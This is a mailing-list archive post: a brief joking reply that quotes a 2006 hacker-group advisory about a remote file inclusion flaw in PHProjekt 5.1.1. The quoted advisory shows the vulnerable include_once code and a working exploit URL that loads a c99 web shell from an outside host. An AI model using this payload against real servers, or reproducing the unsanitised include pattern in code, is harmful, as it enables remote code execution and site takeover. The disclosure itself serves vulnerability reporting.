[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Vuln ....

Hey you could start by writing those sites in english :P


On 10/13/06, hitham hitham <sp1der_net@xxxxxxxxxxx> wrote:


===============================================

# Found By Sp1deR_NeT ..

# E-mail :- Sp1deR_Net@xxxxxxxxxxx

# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com

# We Are :- PalEstine  HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL
)

*************************************

Script :- PHP rojekt5.1.1

-----

Code Vuln :-

$include_path = $path_pre.'lib/lib.inc.php';
include_once($include_path)

In File :- editor_big.php

-----

Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?

Example :- www.sitename.com/[path]/lib/specialdays.php?

$path_pre=www.soqor.net/tools/c99.txt?

-----

Sp1deR_Net@xxxxxxxxxxx

Sp1deR_NeT (((((((()))))))) ^__^

===============================================

_________________________________________________________________
Be the first to hear what's new at MSN - sign up to our free newsletters!
http://www.msn.co.uk/newsletters

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/